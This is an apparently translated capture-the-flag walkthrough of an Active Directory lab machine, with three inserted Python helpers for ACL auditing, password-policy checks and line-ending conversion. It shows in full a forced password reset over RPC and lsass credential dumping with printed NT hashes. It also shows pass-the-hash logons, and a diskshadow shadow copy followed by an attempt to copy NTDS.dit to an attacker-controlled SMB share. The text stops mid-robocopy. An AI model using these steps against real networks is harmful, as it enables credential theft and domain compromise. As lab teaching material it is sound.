After skimming through and scrolling down, there is a First Degree Object Control section, that is, the objects we can control directly:
If you don't know what a given right means, hover over the edge label, right-click and choose Help; BloodHound helpfully explains what the right means:
As it says, the current user support can change AUDIT2020's password without knowing it, and that account is one I found earlier during Kerberos user enumeration. BloodHound also helpfully provides some reference examples:
But that example requires importing PowerView, which means I'd need to be logged on to the target machine, and right now I have no way to do that.
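The First Degree Object Control list above can also be pulled straight out of the users JSON that bloodhound.py wrote, which is useful when auditing a domain for exactly this kind of misplaced right. The following is an added example, not code from the write-up or from BloodHound; it assumes the v4 collector JSON layout (data[] of nodes with ObjectIdentifier, Properties and Aces carrying PrincipalSID and RightName) and uses a constructed two-user sample whose RIDs 1104 and 1105 and whose ACEs are made up.

```python
import json

# Constructed sample in the shape of a bloodhound.py *_users.json file (v4
# collector layout: data[] of nodes with ObjectIdentifier, Properties, Aces).
# The domain SID prefix is the one seen in the lsass dump later on; the RIDs
# 1104 and 1105 and the ACEs themselves are made up for illustration.
DOMAIN_SID = "S-1-5-21-4194615774-2175524697-3563712290"
SAMPLE_USERS_JSON = json.dumps({
    "data": [
        {
            "ObjectIdentifier": f"{DOMAIN_SID}-1104",
            "Properties": {"name": "SUPPORT@BLACKFIELD.LOCAL", "enabled": True},
            "Aces": [],
        },
        {
            "ObjectIdentifier": f"{DOMAIN_SID}-1105",
            "Properties": {"name": "AUDIT2020@BLACKFIELD.LOCAL", "enabled": True},
            "Aces": [
                # Domain Admins (well-known RID 512) owning everything is expected.
                {"PrincipalSID": f"{DOMAIN_SID}-512", "PrincipalType": "Group",
                 "RightName": "GenericAll", "IsInherited": False},
                # A plain user holding ForceChangePassword over another user is not.
                {"PrincipalSID": f"{DOMAIN_SID}-1104", "PrincipalType": "User",
                 "RightName": "ForceChangePassword", "IsInherited": False},
            ],
        },
    ],
    "meta": {"type": "users", "count": 2, "version": 4},
})

# BloodHound edge names that let the holder take over the target account.
TAKEOVER_RIGHTS = {"ForceChangePassword", "GenericAll", "GenericWrite", "Owns",
                   "WriteDacl", "WriteOwner", "AllExtendedRights"}
WELL_KNOWN_RIDS = {"512": "DOMAIN ADMINS", "519": "ENTERPRISE ADMINS",
                   "544": "ADMINISTRATORS"}


def load_users(users_json):
    """Index every user node by its SID so ACE principals can be resolved."""
    return {node["ObjectIdentifier"]: node for node in json.loads(users_json)["data"]}


def resolve_principal(sid, users):
    """Best-effort name for an ACE principal: a user from the same file,
    a well-known group RID, or the raw SID when it is unknown here."""
    if sid in users:
        return users[sid]["Properties"]["name"]
    rid = sid.rsplit("-", 1)[-1]
    return WELL_KNOWN_RIDS.get(rid, sid)


def find_control_edges(users_json, rights=TAKEOVER_RIGHTS, include_inherited=False):
    """Return (holder, right, target) triples, i.e. the 'First Degree Object
    Control' relationships the GUI shows, for every user in the file."""
    users = load_users(users_json)
    edges = []
    for node in users.values():
        for ace in node.get("Aces", []):
            if ace["RightName"] not in rights:
                continue
            if ace.get("IsInherited", False) and not include_inherited:
                continue
            edges.append((resolve_principal(ace["PrincipalSID"], users),
                          ace["RightName"], node["Properties"]["name"]))
    return edges


def edges_held_by(users_json, principal_name):
    """Filter to what one principal (e.g. a compromised account) controls."""
    wanted = principal_name.upper()
    return [e for e in find_control_edges(users_json) if e[0] == wanted]


def non_admin_holders(users_json):
    """Audit view: control edges whose holder is not a well-known admin group,
    which is the list a defender should review and trim."""
    return [e for e in find_control_edges(users_json)
            if e[0] not in WELL_KNOWN_RIDS.values()]
```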
Taking stock:
It seems I've hit a dead end, so I'll go over what I know so far.
1. I have the support user, but I can't log on to the target to get a shell.
2. Kerberos enumeration found three users: svc_backup, support and AUDIT2020. I can change AUDIT2020's password; about svc_backup I know nothing but the username.
3. The SMB shares look like they contain many directories, but they are all empty or ones I have no permission to access; what I can access is little and holds no information.
4. I don't know how to use ldapsearch; there are many tutorials online but they are all outdated. Besides, its relationship to AD is like Apache's to HTTP: it would only give me information about the target domain, and BloodHound has already done much of that for me.
5. Since obtaining the current account I haven't tried RPC again, but likewise it would only enumerate some users and groups, which duplicates what BloodHound has.
6. Port 593 is an HTTP service, but I can't access it: it just spins and spins for a very long time. I opened it in a browser at the very start, forgot about it, and it is still trying to connect.
It looks like I have only three possible approaches:
1. I could look for vulnerabilities in the relevant services; maybe new ones have appeared since the machine was released, but the author couldn't have anticipated those when designing the box, and solving it that way would miss the point.
2. I could brute-force blindly, but I don't think that is viable either; if this box could be solved by mindless password guessing it would have no point.
3. I could look for something, some Windows mechanism, that lets the support user reset AUDIT2020's credentials.
Only the third is really practical. So how do I find that mechanism? The target is running DNS, Kerberos, SMB, LDAP and RPC.
1. DNS shouldn't come with any password-change or logon functionality; maybe that's my ignorance, but I think it can be set aside for now.
2. Kerberos is possible, but everything I found via search engines required me to be logged on to the target system, which I can't do right now.
3. SMB has no system-level overflow vulnerability like EternalBlue here, so it is just a share, and I've really been through all of it with nothing further of use; search engines turned up nothing on changing a user's password over SMB either.
4. LDAP: I know the protocol but not the tooling, so I can set it aside too; if I truly run out of options I'll go and learn it, but I still have one more option.
5. RPC (Remote Procedure Call) is a protocol for requesting services from a remote computer over the network. While searching I found the article Resetting Windows passwords via RPC by Mubix, which clearly explains how to use it.
Resetting a Windows password via RPC:
First I connect to RPC as support:
$ rpcclient -U support //10.10.10.192
Enter WORKGROUP\support's password:
rpcclient $>
I can run the setuserinfo2 command with no arguments:
rpcclient $> setuserinfo2
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $
It returns an error saying invalid parameter, which indirectly shows that the support account I'm using is permitted to use this command. So I can enter the following format:
setuserinfo2 <username> 23 '<password>'
Why 23, I can't yet say; every demo I've seen uses 23, so perhaps the syntax requires it. Since I'm changing a domain user's password, it has to satisfy the domain password policy, which I can read with the following command:
rpcclient $> getdompwinfo
min_password_length: 7
password_properties: 0x00000001
DOMAIN_PASSWORD_COMPLEX
The minimum length is 7, but to avoid other unnecessary trouble I'll pick a password that satisfies most policies:
rpcclient $> setuserinfo2 audit2020 23 'worldisend123!@#'
rpcclient $>
It returned nothing at all; as long as there is no error I can perhaps take that as success, but strangely I still can't log on to the target:
$ evil-winrm -i 10.10.10.192 -u audit2020 -p 'worldisend123!@#'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Did my change fail?
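One thing worth ruling out before blaming the reset is whether the new password could have been rejected by the policy getdompwinfo reported. The block below is an added example, not code from the write-up: it parses that output and applies the Windows complexity rule (minimum length; no sAMAccountName or display-name token of three or more characters inside the password; at least three of the five character categories). The password_properties flag values are the DOMAIN_PASSWORD_INFORMATION bits from MS-SAMR, and the sample text is a constructed copy of the output shown above.

```python
import re

# Constructed copy of the rpcclient getdompwinfo output seen on the box.
GETDOMPWINFO_OUTPUT = """\
min_password_length: 7
password_properties: 0x00000001
\tDOMAIN_PASSWORD_COMPLEX
"""

# password_properties bit flags (MS-SAMR DOMAIN_PASSWORD_INFORMATION).
DOMAIN_PASSWORD_COMPLEX = 0x00000001
DOMAIN_PASSWORD_NO_ANON_CHANGE = 0x00000002
DOMAIN_PASSWORD_NO_CLEAR_CHANGE = 0x00000004
DOMAIN_LOCKOUT_ADMINS = 0x00000008
DOMAIN_PASSWORD_STORE_CLEARTEXT = 0x00000010
DOMAIN_REFUSE_PASSWORD_CHANGE = 0x00000020


def parse_getdompwinfo(text):
    """Pull min_password_length and password_properties out of rpcclient's output."""
    m_len = re.search(r"min_password_length:\s*(\d+)", text)
    m_props = re.search(r"password_properties:\s*(0x[0-9a-fA-F]+|\d+)", text)
    if not (m_len and m_props):
        raise ValueError("not a getdompwinfo dump")
    return {"min_length": int(m_len.group(1)), "properties": int(m_props.group(1), 0)}


def _category_count(pw):
    """Windows counts five categories: upper, lower, digit, non-alphanumeric,
    and alphabetic characters that have no case (e.g. CJK)."""
    return sum([
        any(c.isupper() for c in pw),
        any(c.islower() for c in pw),
        any(c.isdigit() for c in pw),
        any(not c.isalnum() for c in pw),
        any(c.isalpha() and not c.isupper() and not c.islower() for c in pw),
    ])


def _name_tokens(sam_account_name, display_name):
    """The account name (if 3+ chars) and display-name tokens of 3+ chars,
    split on the delimiters Windows uses: , . - _ space # tab."""
    tokens = {sam_account_name} if len(sam_account_name) >= 3 else set()
    for tok in re.split(r"[,.\-_ #\t]", display_name or ""):
        if len(tok) >= 3:
            tokens.add(tok)
    return {t.lower() for t in tokens}


def check_password(candidate, policy, sam_account_name, display_name=""):
    """Return the reasons the DC would reject this password; empty means it passes."""
    reasons = []
    if len(candidate) < policy["min_length"]:
        reasons.append(f"shorter than min_password_length={policy['min_length']}")
    if policy["properties"] & DOMAIN_PASSWORD_COMPLEX:
        lowered = candidate.lower()
        for tok in _name_tokens(sam_account_name, display_name):
            if tok in lowered:
                reasons.append(f"contains account name token '{tok}'")
        if _category_count(candidate) < 3:
            reasons.append("fewer than 3 of the 5 character categories")
    return reasons
```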
Revisiting SMB:
Perhaps I should look at the SMB shares again, since there are still many restricted folders. SMBMap can quickly enumerate which shares I can access with the credentials I give it; Kali Linux ships it by default:
$ smbmap -H 10.10.10.192 -u audit2020 -p 'worldisend123!@#'
[+] IP: 10.10.10.192:445 Name: 10.10.10.192
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share
It looks like I can access forensic now, and indeed I can:
$ smbclient -U audit2020 //10.10.10.192/forensic 'worldisend123!@#'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Feb 23 21:03:16 2020
.. D 0 Sun Feb 23 21:03:16 2020
commands_output D 0 Mon Feb 24 02:14:37 2020
memory_analysis D 0 Fri May 29 04:28:33 2020
tools D 0 Sun Feb 23 21:39:08 2020
5102079 blocks of size 4096. 1681331 blocks available
smb: \>
And the author seems to have prepared a lot of information for me in advance:
smb: \commands_output\> dir
. D 0 Mon Feb 24 02:14:37 2020
.. D 0 Mon Feb 24 02:14:37 2020
domain_admins.txt A 528 Sun Feb 23 21:00:19 2020
domain_groups.txt A 962 Sun Feb 23 20:51:52 2020
domain_users.txt A 16454 Sat Feb 29 06:32:17 2020
firewall_rules.txt A 518202 Sun Feb 23 20:53:58 2020
ipconfig.txt A 1782 Sun Feb 23 20:50:28 2020
netstat.txt A 3842 Sun Feb 23 20:51:01 2020
route.txt A 3976 Sun Feb 23 20:53:01 2020
systeminfo.txt A 4550 Sun Feb 23 20:56:59 2020
tasklist.txt A 9990 Sun Feb 23 20:54:29 2020
Inside there is an administrator user I've never seen before, Ipwn3dYourCompany:
$ cat domain_admins.txt
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator Ipwn3dYourCompany
The command completed successfully.
In another directory I found lsass.zip. LSASS is the Local Security Authority Subsystem Service, which handles authentication and security policy in Windows; essentially, it keeps all sorts of authentication material in its memory space.
smb: \memory_analysis\> ls
. D 0 Fri May 29 04:28:33 2020
.. D 0 Fri May 29 04:28:33 2020
conhost.zip A 37876530 Fri May 29 04:25:36 2020
ctfmon.zip A 24962333 Fri May 29 04:25:45 2020
dfsrs.zip A 23993305 Fri May 29 04:25:54 2020
dllhost.zip A 18366396 Fri May 29 04:26:04 2020
ismserv.zip A 8810157 Fri May 29 04:26:13 2020
lsass.zip A 41936098 Fri May 29 04:25:08 2020
mmc.zip A 64288607 Fri May 29 04:25:25 2020
RuntimeBroker.zip A 13332174 Fri May 29 04:26:24 2020
ServerManager.zip A 131983313 Fri May 29 04:26:49 2020
sihost.zip A 33141744 Fri May 29 04:27:00 2020
smartscreen.zip A 33756344 Fri May 29 04:27:11 2020
svchost.zip A 14408833 Fri May 29 04:27:19 2020
taskhostw.zip A 34631412 Fri May 29 04:27:30 2020
winlogon.zip A 14255089 Fri May 29 04:27:38 2020
wlms.zip A 4067425 Fri May 29 04:27:44 2020
WmiPrvSE.zip A 18303252 Fri May 29 04:27:53 2020
5102079 blocks of size 4096. 1681316 blocks available
smb: \memory_analysis\> get lsass.zip
I can extract credentials from the memory dump with pypykatz, a Python implementation of Mimikatz that Kali Linux ships by default. Since the dump holds every credential in the target process, the output can be long, so for readability I pipe it into more to page through it:
$ unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMP
pypykatz lsa minidump lsass.DMP |more
First I get the svc_backup user's credentials:
$ pypykatz lsa minidump lsass.DMP |more
INFO:root:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
Further down there are also Administrator's credentials:
== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
== MSV ==
Username: Administrator
Domain: BLACKFIELD
LM: NA
NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
DPAPI: 240339f898b6ac4ce3f34702e4a89550
== WDIGEST [25869]==
username Administrator
domainname BLACKFIELD
password None
== Kerberos ==
Username: Administrator
Domain: BLACKFIELD.LOCAL
== WDIGEST [25869]==
username Administrator
domainname BLACKFIELD
password None
== DPAPI [25869]==
luid 153705
key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9
Logging on to the target as svc_backup:
I can try pass-the-hash with the Administrator hash to move onto the target, but I still can't log on:
$ evil-winrm -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62 -i 10.10.10.192
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
More importantly, svc_backup doesn't work either:
$ evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
It seems I still need to start from the SMB side; CrackMapExec can check the hashes for me:
$ crackmapexec smb 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d
I can try administrator:
$ crackmapexec smb 10.10.10.192 -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62 STATUS_LOGON_FAILURE
The administrator hash fails authentication, so that password was evidently changed. svc_backup can't move on directly with pass-the-hash either:
$ ./psexec.py svc_backup@10.10.10.192 -hashes :9658d1d1dcd9250115e2205d9f48400d -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.192.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'forensic' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'profiles$' is not writable.
[-] share 'SYSVOL' is not writable.
wmiexec doesn't work either:
$ ./wmiexec.py -hashes :9658d1d1dcd9250115e2205d9f48400d BLACKFIELD/svc_backup@10.10.10.192 "whoami"
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[-] rpc_s_access_denied
I also tried crackmapexec's winrm mode to check whether the current identity can reach remote management:
$ crackmapexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)
The http link does not open, and Pwn3d! looks like it could be the user's plaintext password, but unfortunately I still cannot log in:
$ evil-winrm -i 10.10.10.192 -u svc_backup -p Pwn3d!
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
SMB does not show any more shares either:
$ smbmap -H 10.10.10.192 -u svc_backup -p 'Pwn3d!'
[!] Authentication error on 10.10.10.192
If the administrator authentication failed because the hash was wrong, then svc_backup should have been able to log in, so why did it fail? I tried once more, and this time it actually logged in. Go figure:
$ evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
Getting user.txt:
I found user.txt:
*Evil-WinRM* PS C:\Users\svc_backup> cd Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls
Directory: C:\Users\svc_backup\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 2:26 PM 32 user.txt
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> type user.txt
Dumping hashes via a volume shadow copy:
I can check the current user's privileges, since its username looks like it belongs to a special Active Directory group:
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
It can add workstations, back up, restore, shut down, bypass traverse checking and increase a process working set, because it really is in the Backup Operators group:
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> net user svc_backup
User name svc_backup
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2020 10:54:48 AM
Password expires Never
Password changeable 2/24/2020 10:54:48 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/23/2022 5:42:10 AM
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>
I can enter the administrator's directory, but I cannot read root.txt; it looks like I still need domain admin privileges:
*Evil-WinRM* PS C:\Users\administrator\desktop> type root.txt
Access to the path 'C:\Users\administrator\desktop\root.txt' is denied.
At line:1 char:1
+ type root.txt
+ ~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\administrator\desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\administrator\desktop>
Members of the Backup Operators group are dangerous if their credentials leak, because they can create volume shadow copies and access files the system has in use, for example reading Ntds.dit, which lives at C:\Windows\NTDS\NTDS.dit. But Active Directory is accessing Ntds.dit all the time, and any attempt to operate on it directly is refused by the system. The following article describes several ways of dumping the hashes, and I also found a way that the system does not refuse: if I copy it somewhere else and then read or modify that copy, it does not interfere with Active Directory's access to NTDS.dit, so I am not refused:
https://pentestlab.blog/tag/diskshadow/
Microsoft has official documentation for the diskshadow tool:
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow
More about diskshadow and volume shadow copies is covered in 《内网安全攻防:渗透测试实战指南》 (Intranet Security Attack and Defense: A Practical Guide to Penetration Testing); this is part of the example from the book:
// set the shadow copy context
set context persistent nowriters
// add a volume
add volume c: alias <alias>
// create the snapshot
create
// assign a drive letter
expose %<alias>% <drive letter>:
So I can follow the same pattern:
set context persistent nowriters
add volume c: alias whomi
create
expose %whomi% z:
Evil-WinRM has a built-in file upload function:
*Evil-WinRM* PS C:\Users\svc_backup\desktop> upload whoami.txt
Info: Uploading whoami.txt to C:\Users\svc_backup\desktop\whoami.txt
Data: 112 bytes of 112 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_backup\desktop> ls
Directory: C:\Users\svc_backup\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 2:26 PM 32 user.txt
-a---- 4/23/2022 6:29 AM 84 whoami.txt
But it failed; it stopped halfway through:
*Evil-WinRM* PS C:\Users\svc_backup\desktop> diskshadow /s whoami.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 4/23/2022 6:31:58 AM
-> set context persistent nowriters
-> add volume c: alias whomi
-> create
The .cab metadata file cannot be stored in the current working directory, because it is read-only.
Use SET METADATA to specify an existing, writable directory
I did not know the cause. Worried that too many files in one directory would leave a pile of junk behind, I was going to try another directory, and while doing so I found the following:
*Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/26/2020 5:38 PM PerfLogs
d----- 6/3/2020 9:47 AM profiles
d-r--- 3/19/2020 11:08 AM Program Files
d----- 2/1/2020 11:05 AM Program Files (x86)
d----- 4/23/2022 6:33 AM temp
d-r--- 2/23/2020 9:16 AM Users
d----- 9/21/2020 4:29 PM Windows
-a---- 2/28/2020 4:36 PM 447 notes.txt
*Evil-WinRM* PS C:\> type notes.txt
Mates,
After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.
We will probably have to backup & restore things later.
- Mike.
PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)
root.txt is encrypted, so even if I can get it I will still need the key to decrypt it, but that is not what I should be thinking about right now; I need administrator privileges first. I also found out why the earlier run failed: the file was edited on Linux and needs a format conversion before Windows recognises it properly:
$ unix2dos whoami.txt
unix2dos: 正在转换文件 whoami.txt 为DOS格式...
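The failure above is a line-ending problem: diskshadow /s reads CRLF-terminated lines, and a script saved on Linux with bare LF stops partway through with a misleading error. The following is an added example (not from the original post or from unix2dos itself) that reports which terminators a script uses and normalises it the way unix2dos does, including files with mixed endings and a missing final newline; the sample script bytes are the four commands from this post, embedded here as constructed input.

```python
"""Report and normalise line endings of a script destined for a Windows
tool such as diskshadow /s, which expects CRLF-terminated lines."""


def line_ending_report(data: bytes) -> dict:
    """Count CRLF, bare LF and bare CR terminators in `data`."""
    crlf = data.count(b"\r\n")
    lf = data.count(b"\n") - crlf     # LF not preceded by CR
    cr = data.count(b"\r") - crlf     # CR not followed by LF (old Mac style)
    return {"crlf": crlf, "lf": lf, "cr": cr}


def is_dos(data: bytes) -> bool:
    """True when every terminator is CRLF, i.e. safe for diskshadow /s."""
    r = line_ending_report(data)
    return r["lf"] == 0 and r["cr"] == 0


def to_dos(data: bytes) -> bytes:
    """Normalise every terminator to CRLF (idempotent, like unix2dos).

    Mixed CRLF/LF/CR input is first unified to LF so that an existing CRLF
    never becomes CRCRLF, and a missing final newline is added so that the
    last command is terminated too."""
    unified = data.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
    if unified and not unified.endswith(b"\n"):
        unified += b"\n"
    return unified.replace(b"\n", b"\r\n")


# Constructed sample: the diskshadow script from this post as written on Linux.
SAMPLE_SCRIPT = (
    b"set context persistent nowriters\n"
    b"add volume c: alias whomi\n"
    b"create\n"
    b"expose %whomi% z:\n"
)

if __name__ == "__main__":
    print(line_ending_report(SAMPLE_SCRIPT), is_dos(SAMPLE_SCRIPT))
    fixed = to_dos(SAMPLE_SCRIPT)
    print(line_ending_report(fixed), is_dos(fixed), len(fixed))
```

Running it on the sample shows four bare LF terminators before and four CRLF terminators after, and the converted script is exactly four bytes longer (88 instead of 84), which matches the growth you would expect from unix2dos on a four-line file.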
*Evil-WinRM* PS C:\temp> upload whoami.txt
Info: Uploading whoami.txt to C:\temp\whoami.txt
Data: 120 bytes of 120 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> ls
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/23/2022 6:42 AM 92 whoami.txt
*Evil-WinRM* PS C:\temp> diskshadow /s whoami.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 4/23/2022 6:43:05 AM
-> set context persistent nowriters
-> add volume c: alias whomi
-> create
Alias whomi for shadow ID {40f76e7e-86ba-4fba-a5da-3a630b790a01} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {6b14bcc8-3129-4976-a812-9f81e5093ce8} set as environment variable.
Querying all shadow copies with the shadow copy set ID {6b14bcc8-3129-4976-a812-9f81e5093ce8}
* Shadow copy ID = {40f76e7e-86ba-4fba-a5da-3a630b790a01} %whomi%
- Shadow copy set: {6b14bcc8-3129-4976-a812-9f81e5093ce8} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 4/23/2022 6:43:07 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %whomi% z:
-> %whomi% = {40f76e7e-86ba-4fba-a5da-3a630b790a01}
The shadow copy was successfully exposed as z:\.
->
*Evil-WinRM* PS C:\temp>
This time there is a lot more output, including the message that the shadow copy was successfully exposed, so it looks like it worked; I can try accessing the Z: volume:
*Evil-WinRM* PS C:\temp> z:
*Evil-WinRM* PS Z:\> ls
Directory: Z:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/26/2020 5:38 PM PerfLogs
d----- 6/3/2020 9:47 AM profiles
d-r--- 3/19/2020 11:08 AM Program Files
d----- 2/1/2020 11:05 AM Program Files (x86)
d----- 4/23/2022 6:42 AM temp
d-r--- 2/23/2020 9:16 AM Users
d----- 9/21/2020 4:29 PM Windows
-a---- 2/28/2020 4:36 PM 447 notes.txt
*Evil-WinRM* PS Z:\>
Next I should read the Ntds.dit file. For convenience I want to transfer Ntds.dit to my own machine, which I plan to do through an SMB share:
$ ./smbserver.py share /home/worldisend -smb2support -username whoami -password whoami
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Unfortunately, the permissions are not enough:
*Evil-WinRM* PS Z:\> copy z:\Windows\ntds\ntds.dit \\10.10.16.12\share\ntds.dit
Access to the path 'Z:\Windows\ntds\ntds.dit' is denied.
At line:1 char:1
+ copy z:\Windows\ntds\ntds.dit \\10.10.16.12\share\ntds.dit
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (Z:\Windows\ntds\ntds.dit:FileInfo) [Copy-Item], UnauthorizedAccessException
+ FullyQualifiedErrorId : CopyFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.CopyItemCommand
*Evil-WinRM* PS Z:\>
The robocopy bundled with Evil-WinRM does not work either:
*Evil-WinRM* PS Z:\> robocopy /b z:\windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Saturday, April 23, 2022 6:56:40 AM
Source : z:\windows\ntds\
Dest : Z:\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
